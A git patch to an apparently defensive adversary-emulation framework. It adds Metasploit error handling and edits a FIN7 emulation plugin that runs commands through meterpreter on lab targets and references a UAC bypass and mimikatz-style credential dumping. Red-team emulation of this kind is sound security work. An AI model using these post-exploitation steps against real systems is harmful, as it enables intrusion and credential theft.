From 9a25537e99bdb19a76ab564867cd88644fe0433b Mon Sep 17 00:00:00 2001 From: Thorsten Sick Date: Mon, 21 Jun 2021 07:54:31 +0200 Subject: [PATCH] Added Metasploit exception. --- app/config.py | 8 ++++++++ app/exceptions.py | 4 ++++ app/metasploit.py | 12 ++++++++++-- .../adversary_emulations/FIN7/fin7_section1.py | 17 +++++++++-------- .../FIN7/local_experiment_config.yaml | 2 ++ 5 files changed, 33 insertions(+), 10 deletions(-) diff --git a/app/config.py b/app/config.py index b8bbb53..27d978d 100644 --- a/app/config.py +++ b/app/config.py @@ -50,6 +50,14 @@ class MachineConfig(): return self.raw_config["vm_name"] + def get_nicknames(self): + """ Gets the nicknames """ + + if "nicknames" in self.raw_config: + return self.raw_config["nicknames"] or [] + + return [] + def vmcontroller(self): """ Returns the vm controller. lowercase """ diff --git a/app/exceptions.py b/app/exceptions.py index 12f02fc..e8c764f 100644 --- a/app/exceptions.py +++ b/app/exceptions.py @@ -20,3 +20,7 @@ class CalderaError(Exception): class NetworkError(Exception): """ Network connection (like ssh) can not be established """ + + +class MetasploitError(Exception): + """ Metasploit had an error """ diff --git a/app/metasploit.py b/app/metasploit.py index cdaafff..5e5eab2 100644 --- a/app/metasploit.py +++ b/app/metasploit.py @@ -6,6 +6,7 @@ from app.attack_log import AttackLog from app.interface_sfx import CommandlineColors import time import socket +from app.exceptions import MetasploitError import os @@ -79,7 +80,14 @@ class Metasploit(): """ # Get_ip can also return a network name. Matching a session needs a real ip - ip = socket.gethostbyname(target.get_ip()) + name_resolution_worked = True + try: + ip = socket.gethostbyname(target.get_ip()) + except socket.gaierror: + ip = target.get_ip() # Limp on feature if we can not get a name resolution + name_resolution_worked = False + print(f"Name resolution for {target.get_ip()} failed. Sessions are: {self.get_client().sessions.list}") + # TODO: Try to get the ip address from kali system retries = 100 while retries > 0: @@ -90,7 +98,7 @@ class Metasploit(): time.sleep(1) retries -= 1 - return None # TODO: Better error handlign as soon as we know where we use it + raise MetasploitError(f"Could not find session for {target.get_ip()} Name resolution worked: {name_resolution_worked}") def meterpreter_execute(self, cmds: [str], session_number: int, delay=0) -> str: """ Executes commands on the meterpreter, returns results read from shell diff --git a/plugins/default/adversary_emulations/FIN7/fin7_section1.py b/plugins/default/adversary_emulations/FIN7/fin7_section1.py index 59ebd38..a9dae9e 100644 --- a/plugins/default/adversary_emulations/FIN7/fin7_section1.py +++ b/plugins/default/adversary_emulations/FIN7/fin7_section1.py @@ -128,6 +128,9 @@ class FIN7Plugin(AttackPlugin): # -f C : output is c code # --encrypt xor : xor encrypt the results # --encrypt-key m : the encryption key + + self.attacker_machine_plugin.remote_run("sudo apt install msfpc") # MSFVenom needs to be installed + venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger) venom.generate_and_deploy(payload=self.payload_type_1, architecture="x64", @@ -179,11 +182,10 @@ class FIN7Plugin(AttackPlugin): f"{CommandlineColors.OKCYAN}Execute arp through meterpreter{CommandlineColors.ENDC}", 1) print(metasploit.meterpreter_execute_on(["arp"], hotelmanager)) # powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/ - # TODO: Add real ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error - # itadmin = "127.0.0.1" - # self.attack_logger.vprint( - # f"{CommandlineColors.OKCYAN}Execute nslookup through meterpreter{CommandlineColors.ENDC}", 1) - # print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin}'"], hotelmanager)) + # TODO: Add a new machine in config as ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error + itadmin = self.get_target_by_name("itadmin") + self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Execute nslookup through meterpreter{CommandlineColors.ENDC}", 1) + print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin}'"], hotelmanager)) # Copy step 5 attack tools to attacker @@ -215,7 +217,6 @@ class FIN7Plugin(AttackPlugin): self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute UAC bypass (and mimikatz) through meterpreter{CommandlineColors.ENDC}", 1) print(metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20)) - # TODO: Make it more reliable. Also test which OS versions are working properly. It worked at least once # samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/ @@ -313,8 +314,8 @@ class FIN7Plugin(AttackPlugin): self.step1() self.step2() self.step3() # Done and works - self.step4() - self.step5() + self.step4() # Partial - with a hack + self.step5() # Done and quite ok self.step6() self.step7() self.step8() diff --git a/plugins/default/adversary_emulations/FIN7/local_experiment_config.yaml b/plugins/default/adversary_emulations/FIN7/local_experiment_config.yaml index 34a449a..d1eace7 100644 --- a/plugins/default/adversary_emulations/FIN7/local_experiment_config.yaml +++ b/plugins/default/adversary_emulations/FIN7/local_experiment_config.yaml @@ -57,8 +57,10 @@ targets: vm_name: target2 + # TODO: itadmin must be moved to another target nicknames: - hotelmanager + - itadmin os: windows paw: target2w